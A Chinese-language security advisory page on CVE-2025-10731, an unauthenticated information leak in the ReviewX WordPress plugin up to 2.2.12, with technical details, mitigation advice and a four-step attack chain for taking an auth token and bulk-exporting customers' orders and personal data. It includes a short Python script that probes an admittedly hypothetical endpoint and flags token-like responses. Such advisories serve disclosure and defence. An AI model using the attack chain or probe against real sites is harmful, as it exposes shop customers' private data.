CVE-2025-10731 CVSS 5.3 中危

CVE-2025-10731 ReviewX插件敏感信息泄露漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-10731

漏洞类型

敏感信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ReviewX WordPress Plugin

漏洞概述

CVE-2025-10731 是 WordPress 插件 ReviewX 中发现的一个敏感信息泄露漏洞。该漏洞影响 2.2.12 及之前的所有版本。由于 `allReminderSettings` 函数存在缺陷，未经身份验证的攻击者可以利用此漏洞获取身份验证令牌。一旦获得令牌，攻击者即可绕过管理员权限限制，进而访问并导出包括订单详情、用户姓名、电子邮件、地址、电话号码在内的敏感数据。此漏洞无需用户交互即可通过网络远程利用，对用户隐私构成严重威胁。

技术细节

该漏洞的根源在于插件中的 `allReminderSettings` 函数在处理请求时未实施严格的访问控制机制。根据代码分析，受影响的文件包括 `DataSyncController.php` 和 `EmailTemplateController.php` 等。攻击者可以通过构造特定的网络请求，直接调用该函数，而无需提供任何有效的管理员凭据或会话令牌。当该函数被调用时，它可能会返回包含敏感信息的配置数据，其中可能包括用于验证管理员权限的令牌或 API 密钥。攻击者捕获这些令牌后，可以将其注入到后续的请求中，从而欺骗服务器认为请求来自合法的管理员。这使得攻击者能够绕过 `AdminMiddleware.php` 中定义的中间件检查，访问原本仅限管理员访问的导出功能。最终，攻击者可以批量导出店铺的订单数据及用户个人隐私信息，导致严重的数据泄露。整个利用过程无需用户交互，且攻击成本极低。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标网站是否安装了 ReviewX 插件，并确定其版本号低于或等于 2.2.12。

STEP 2

2. 发起未授权访问

攻击者向包含 `allReminderSettings` 函数的 API 端点发送特制的 HTTP GET 请求，无需提供任何身份验证凭据。

STEP 3

3. 获取敏感令牌

服务器因缺少权限校验，返回包含认证令牌或其他敏感配置信息的 JSON 数据。攻击者解析响应并提取令牌。

STEP 4

4. 权限提升与数据窃取

攻击者利用获取的令牌构造新的请求，绕过管理员中间件检查，访问受限的导出接口，批量下载订单和用户信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Hypothetical endpoint based on function name)
target_url = "http://example.com/wp-json/reviewx/v1/allReminderSettings"

headers = {
    "User-Agent": "CVE-2025-10731-Scanner/1.0",
    "Accept": "application/json"
}

def check_vulnerability(url):
    try:
        # Send unauthenticated request to the vulnerable endpoint
        response = requests.get(url, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print("[+] Potential Vulnerability Detected!")
            print("[+] Response Content:")
            print(response.text)
            # Check if response contains sensitive keys or tokens
            if "token" in response.text.lower() or "auth" in response.text.lower():
                print("[!] WARNING: Sensitive authentication data likely exposed.")
        else:
            print(f"[-] Endpoint returned status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    check_vulnerability(target_url)

影响范围

ReviewX <= 2.2.12

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用 ReviewX 插件以消除攻击面。同时，管理员应检查系统日志，排查是否存在异常的数据访问或导出行为，并考虑重置受影响系统的管理员密钥。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表